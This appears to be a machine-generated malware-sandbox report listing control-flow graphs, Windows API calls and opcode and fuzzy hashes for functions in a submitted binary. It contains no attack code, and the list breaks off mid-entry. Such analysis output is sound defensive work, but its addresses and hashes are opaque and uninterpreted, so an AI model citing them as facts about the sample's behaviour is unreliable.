                                                                  control_flow_graph 1006 1c1ff0-1c2094 call 1c8d50 * 4 SetupOpenInfFileW 1015 1c209a-1c20b2 1006->1015 1016 1c2145-1c2159 SetupFindFirstLineW 1006->1016 1019 1c20be-1c20d7 1015->1019 1020 1c20b4-1c20b9 1015->1020 1017 1c215f-1c2177 call 1c2a40 1016->1017 1018 1c2209-1c2229 SetupCloseInfFile 1016->1018 1017->1018 1031 1c217d-1c219b call 1c80e0 call 1c22c0 1017->1031 1024 1c222b-1c2230 1018->1024 1025 1c2235-1c224e 1018->1025 1022 1c20d9-1c20de 1019->1022 1023 1c20e3-1c20fc 1019->1023 1020->1019 1022->1023 1027 1c20fe-1c2103 1023->1027 1028 1c2108-1c2124 1023->1028 1024->1025 1029 1c225a-1c2273 1025->1029 1030 1c2250-1c2255 1025->1030 1027->1028 1032 1c2126-1c212b 1028->1032 1033 1c2130-1c2144 1028->1033 1034 1c227f-1c229b 1029->1034 1035 1c2275-1c227a 1029->1035 1030->1029 1042 1c219d-1c21b3 call 1c2a40 1031->1042 1043 1c2201 1031->1043 1032->1033 1036 1c229d-1c22a2 1034->1036 1037 1c22a7-1c22bd 1034->1037 1035->1034 1036->1037 1042->1018 1046 1c21b5-1c21ff call 1c2af0 call 1c5e30 call 1c8000 call 1c80e0 call 1c22c0 1042->1046 1043->1018 1046->1018 1046->1043
                                                                  APIs
                                                                  • SetupOpenInfFileW.SETUPAPI(?,00000000,00000002,00000000), ref: 001C2089
                                                                  • SetupFindFirstLineW.SETUPAPI(00000000,Manufacturer,00000000,?), ref: 001C2151
                                                                  • SetupCloseInfFile.SETUPAPI(00000000), ref: 001C220A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Setup$File$CloseFindFirstLineOpen
                                                                  • String ID: Manufacturer
                                                                  • API String ID: 4028048665-624639268
                                                                  • Opcode ID: 8b3ee88d394fedd9e40b9e3bccdfdba9bd2ebc71cf243e29602d38b06c2216e0
                                                                  • Instruction ID: c2817015b834f78cd3ab1a74a5fdbd05869b36f94331832aaf813f9e154f69e8
                                                                  • Opcode Fuzzy Hash: 8b3ee88d394fedd9e40b9e3bccdfdba9bd2ebc71cf243e29602d38b06c2216e0
                                                                  • Instruction Fuzzy Hash: D29136712047418FD314CB2CC886F5AB7E5AFA9324F148B5DF4698B2E1DB31E905CB92

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1057 2d86c3-2d86c9 1059 2d863c-2d863f 1057->1059 1060 2d863a 1057->1060 1061 2d8644-2d864a 1059->1061 1062 2d8641 1059->1062 1060->1059 1063 2d864c-2d864e 1061->1063 1062->1061 1064 2d865c-2d8664 1063->1064 1065 2d8650-2d865a 1063->1065 1066 2d866a-2d866c 1064->1066 1067 2d8666-2d8668 1064->1067 1065->1063 1065->1064 1069 2d866e-2d8671 1066->1069 1070 2d8690-2d8697 call 2d85fc 1066->1070 1068 2d86bf-2d86c2 1067->1068 1069->1070 1071 2d8673-2d8685 call 2d85fc 1069->1071 1074 2d869c-2d86a3 1070->1074 1071->1070 1077 2d8687 1071->1077 1074->1067 1076 2d86a5-2d86a7 1074->1076 1078 2d86bd 1076->1078 1079 2d86a9-2d86b8 call 2c39d7 1076->1079 1081 2d8688-2d868e call 2be05b 1077->1081 1078->1068 1079->1078 1084 2d86ba-2d86bb 1079->1084 1081->1067 1084->1081
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Xfsopenstd::_$_fseek
                                                                  • String ID: t!1
                                                                  • API String ID: 1675860589-1912081479
                                                                  • Opcode ID: 7dc27eee0fa2dfc856dd7b6f15679466ed39d38a18ea99739c399eb292fdfd1e
                                                                  • Instruction ID: 32d46be9f1da2eae69c308e605e8601574826d1261f8bff99bac3bbe8cb948bc
                                                                  • Opcode Fuzzy Hash: 7dc27eee0fa2dfc856dd7b6f15679466ed39d38a18ea99739c399eb292fdfd1e
                                                                  • Instruction Fuzzy Hash: F611E032A312166BEB251D699C02FBB368D9B047B0F194036FF0995391EEB1DC3286C9

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1086 1cd20c-1cd23b GetSystemDirectoryW 1087 1cd23d-1cd23f 1086->1087 1088 1cd241-1cd257 call 2bf15f 1086->1088 1089 1cd294-1cd2a1 call 2bc787 1087->1089 1094 1cd259-1cd270 call 2bf5ea 1088->1094 1095 1cd272-1cd285 call 2bf5ea 1088->1095 1094->1087 1094->1095 1095->1087 1100 1cd287-1cd28e call 1c94e4 1095->1100 1102 1cd293 1100->1102 1102->1089
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 001CD233
                                                                  • _wcslen.LIBCMT ref: 001CD248
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: DirectorySystem_wcslen
                                                                  • String ID: \
                                                                  • API String ID: 2940219301-2967466578
                                                                  • Opcode ID: ae5e696d0c4acfd4346a8b4d6a2eef835de43c9a92fbaeab07b9aa7d6e96259e
                                                                  • Instruction ID: 459ef4a0ade6cdd38fdd085bacec160871f2dc4d6a6d9e56ddecd92fbbe04025
                                                                  • Opcode Fuzzy Hash: ae5e696d0c4acfd4346a8b4d6a2eef835de43c9a92fbaeab07b9aa7d6e96259e
                                                                  • Instruction Fuzzy Hash: 0A01757190011CA6CB24DA75ED89FEB77BCAF64350F1408BEB809D3141FB70DA98CA50

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1103 237c0e-237cdd call 2bea56 call 1cfcaf call 1caf34 call 1c86c0 call 1e78df call 2330a8 call 1e7912 1118 237d13-237d15 1103->1118 1119 237cdf-237cfd CreateCompatibleDC * 2 1103->1119 1122 237d16-237da1 call 237836 call 2beb2e 1118->1122 1120 237d03 call 1cfc45 1119->1120 1121 237cff-237d01 1119->1121 1124 237d08-237d11 1120->1124 1121->1120 1121->1124 1124->1122
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00237C15
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00237CE0
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00237CEC
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: CompatibleCreate$H_prolog3
                                                                  • String ID:
                                                                  • API String ID: 2193723985-0
                                                                  • Opcode ID: e5724c26a3939327b91223102437a4df48d932a0b0f26f03406809fdf4de6224
                                                                  • Instruction ID: f5621818d8b6d05655a852ea686f1ac050fcb85b777af4fc8cdb98c2ab21324e
                                                                  • Opcode Fuzzy Hash: e5724c26a3939327b91223102437a4df48d932a0b0f26f03406809fdf4de6224
                                                                  • Instruction Fuzzy Hash: 1651CCB09217258FCF59DF29D5C16997BA8BF09B00F1081ABEC49DF25ADBB08541CFA0
                                                                  APIs
                                                                    • Part of subcall function 001C5200: std::_Lockit::_Lockit.LIBCPMT ref: 001C5211
                                                                    • Part of subcall function 001C67F0: std::_Lockit::_Lockit.LIBCPMT ref: 001C681D
                                                                    • Part of subcall function 001C67F0: std::_Lockit::_Lockit.LIBCPMT ref: 001C6840
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001C41A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: LockitLockit::_std::_
                                                                  • String ID: .\uninstall.log
                                                                  • API String ID: 3382485803-3792079071
                                                                  • Opcode ID: a5c9c38cb162cf07cc52818f3b98180b519dc71e9a9ed92cd6bcbd919ffce9f9
                                                                  • Instruction ID: 5e140f7bc7ba48828bb5cc7167e7a3f7eca661a91d7c2e936db1375f47046468
                                                                  • Opcode Fuzzy Hash: a5c9c38cb162cf07cc52818f3b98180b519dc71e9a9ed92cd6bcbd919ffce9f9
                                                                  • Instruction Fuzzy Hash: 5221C1B1B446149BCB10EF289C52F9DB3A8EB64B20F10062EF829E37C0DB35F9048691
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove_s
                                                                  • String ID:
                                                                  • API String ID: 800865076-0
                                                                  • Opcode ID: 1cc18de591e8488ede511b1535777567ef901f2418845d51671b50a2f060aef4
                                                                  • Instruction ID: 1e6f7b22e164948f83a6db646dd4571ce94bbb64cafd53dda3f5dae4694ae440
                                                                  • Opcode Fuzzy Hash: 1cc18de591e8488ede511b1535777567ef901f2418845d51671b50a2f060aef4
                                                                  • Instruction Fuzzy Hash: 54219032601504EFCB00DF68C8C9EAAF3A9EFA4310B10819EE8045B211DF31ED10DBA4
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 001CF2C8
                                                                  • RtlReleaseActivationContext.NTDLL(?,00000004,001CF3DB), ref: 001CF34C
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ActivationContextH_prolog3Release
                                                                  • String ID:
                                                                  • API String ID: 1979592854-0
                                                                  • Opcode ID: ca1420dbc2616af2bded350056c8a5a9da011c2548133d7225add658d22e04fe
                                                                  • Instruction ID: d8c770f5c845197b24198720a832c1baa9e80572483c08b5fbce27e913121252
                                                                  • Opcode Fuzzy Hash: ca1420dbc2616af2bded350056c8a5a9da011c2548133d7225add658d22e04fe
                                                                  • Instruction Fuzzy Hash: 46214538201A41DFDB28DF79C498E2AB7F1BF99714714466DE1A3CB6A0CB30E802DB10
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,001C106C,00000000), ref: 001CA2D3
                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,001C106C,00000000), ref: 001CA2DB
                                                                    • Part of subcall function 001CF00F: GetModuleFileNameW.KERNEL32(?,?,00000105,?,?), ref: 001CF042
                                                                    • Part of subcall function 001CF00F: SetLastError.KERNEL32(0000006F,?,?), ref: 001CF059
                                                                    • Part of subcall function 001CA0E9: GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,00000000), ref: 001CA126
                                                                    • Part of subcall function 001CA0E9: PathFindExtensionW.SHLWAPI(?,?,?,00000000), ref: 001CA140
                                                                    • Part of subcall function 001CA0E9: __wcsdup.LIBCMT ref: 001CA18A
                                                                    • Part of subcall function 001CA0E9: __wcsdup.LIBCMT ref: 001CA1C8
                                                                    • Part of subcall function 001CA0E9: __wcsdup.LIBCMT ref: 001CA1FC
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Error__wcsdup$FileModeModuleName$ExtensionFindLastPath
                                                                  • String ID:
                                                                  • API String ID: 972848482-0
                                                                  • Opcode ID: a64b27df9075d4e8ae21c197c9df88582bbee8ae5cb813882caafc36216f953d
                                                                  • Instruction ID: 307f7be96e5eb2275601b7513a9d594b1fc7bacb5e4745efc6d10e014bf33982
                                                                  • Opcode Fuzzy Hash: a64b27df9075d4e8ae21c197c9df88582bbee8ae5cb813882caafc36216f953d
                                                                  • Instruction Fuzzy Hash: ACF06D71A102984FCB51EFA4D405F5D3B9AAF64754F05806EF5488B263DB34DC11CBA6
                                                                  APIs
                                                                    • Part of subcall function 002BE629: __getptd_noexit.LIBCMT ref: 002BE629
                                                                  • __lock_file.LIBCMT ref: 002BE0A2
                                                                    • Part of subcall function 002BD549: __lock.LIBCMT ref: 002BD56E
                                                                  • __fclose_nolock.LIBCMT ref: 002BE0AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2800547568-0
                                                                  • Opcode ID: 9cab06e92c1f7f943ffd49e3354f352814fce58201dd10a4e74877e83f4cd303
                                                                  • Instruction ID: e323c23ab23ddc4fd3cc1144f6330f18f28d7200418207acbd9af9ef5a6a8bcc
                                                                  • Opcode Fuzzy Hash: 9cab06e92c1f7f943ffd49e3354f352814fce58201dd10a4e74877e83f4cd303
                                                                  • Instruction Fuzzy Hash: 2BF09030834719DADB10BB79D902BEF7BA06F103B4F218B08E435BA1D1C7B89A219F55
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 001D0438
                                                                  • GetWindowDC.USER32(00000000,00000004,001CE19D,00000000,?,?,002F5254), ref: 001D0464
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3Window
                                                                  • String ID:
                                                                  • API String ID: 616115145-0
                                                                  • Opcode ID: b031f460bcfb89cc41b5f7fffe418da09abaf4ce3c89bae6dae2aaa11f4a1c4a
                                                                  • Instruction ID: 9a7e1613b4e7741785e8588bd9d882bc8f92cf6122827512b89f417bf3c0da27
                                                                  • Opcode Fuzzy Hash: b031f460bcfb89cc41b5f7fffe418da09abaf4ce3c89bae6dae2aaa11f4a1c4a
                                                                  • Instruction Fuzzy Hash: B5F01CB0A107158FCF61EF79C400B5EBAE4BF18700B10882EA59ACB741EB30D950CB95
                                                                  APIs
                                                                  • ActivateActCtx.KERNEL32(?,?,0031BB48,00000010,001C95B9,KERNEL32.DLL), ref: 001C9504
                                                                  • LoadLibraryW.KERNELBASE(?), ref: 001C951B
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ActivateLibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 389599620-0
                                                                  • Opcode ID: 9b9a332b9100badb10c45d56a1d259a4efaf62bfd136380ba903fc58fd98741f
                                                                  • Instruction ID: d73397baab20c509bfdc59d327a0a13ef530c5723fa93d555f1623f47dfbda04
                                                                  • Opcode Fuzzy Hash: 9b9a332b9100badb10c45d56a1d259a4efaf62bfd136380ba903fc58fd98741f
                                                                  • Instruction Fuzzy Hash: 13F08CB1C10218EBCF01AFA4DC09ADEBB70BB18B40F40446AF055A6190CB74C502DF80
                                                                  APIs
                                                                  • ___crtCorExitProcess.LIBCMT ref: 002BEB93
                                                                    • Part of subcall function 002BEB60: GetModuleHandleW.KERNEL32(mscoree.dll,?,002BEB98,?,?,002BE4E0,000000FF,0000001E,00000001,00000000,00000000,?,002C4298,?,00000001,?), ref: 002BEB6A
                                                                    • Part of subcall function 002BEB60: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002BEB7A
                                                                  • ExitProcess.KERNEL32 ref: 002BEB9C
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                  • String ID:
                                                                  • API String ID: 2427264223-0
                                                                  • Opcode ID: 0e1818a0e10278377ee08b809d99a73ad40405f273aaa9d160dab1944ffb6ee8
                                                                  • Instruction ID: df296b1d82940b7fc1db422fede98ef4bd3586a2bc5477308b9e9f97e78f1b80
                                                                  • Opcode Fuzzy Hash: 0e1818a0e10278377ee08b809d99a73ad40405f273aaa9d160dab1944ffb6ee8
                                                                  • Instruction Fuzzy Hash: 9CB0923140018CBFCF112F23ED0EC897F2AEB807A0B114020F90A09031DF72EDA29A88
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: _memcpy_s
                                                                  • String ID:
                                                                  • API String ID: 2001391462-0
                                                                  • Opcode ID: 360983abc963d180cc33d66c654b976c084fbdc2e506759bc210f0887cbecbba
                                                                  • Instruction ID: 707b031b93cdbd7e2a88d26fb8e3078ba5d4962b0ba231a8227d76aa8e95de1e
                                                                  • Opcode Fuzzy Hash: 360983abc963d180cc33d66c654b976c084fbdc2e506759bc210f0887cbecbba
                                                                  • Instruction Fuzzy Hash: 4F116D76600A04AFC309DF58C881DAAB3A9FF99310715865EE5198B351EB31ED01CBD0
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 001D1639
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
